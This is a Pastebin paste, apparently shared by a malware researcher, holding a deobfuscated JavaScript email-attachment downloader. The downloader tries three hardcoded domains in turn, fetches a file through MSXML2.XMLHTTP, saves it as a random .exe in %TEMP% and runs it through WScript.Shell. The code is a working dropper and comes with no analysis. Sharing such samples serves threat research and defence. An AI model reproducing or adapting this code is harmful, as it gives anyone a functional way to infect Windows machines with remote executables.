SHARE
TWEET

Malicious Javascript attachment (deobfuscated)

dynamoo Mar 24th, 2015 311 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. function dl(fr) { var b = "pitfaa.nidhog.com lawyermyowin.com www.lead.com.co".split(" "); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+Math.round(Math.random()*100000000)+".exe"; var dn = 0; var xo = new ActiveXObject("MSXML2.XMLHTTP"); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject("ADODB.Stream"); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; try { xo.open("GET","http://"+b[i]+"/document.php?rnd="+fr+"&id="+id, false); xo.send(); } catch (er) {}; if (dn == 1) break; } }; dl(1161); dl(7252); dl(4283);
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top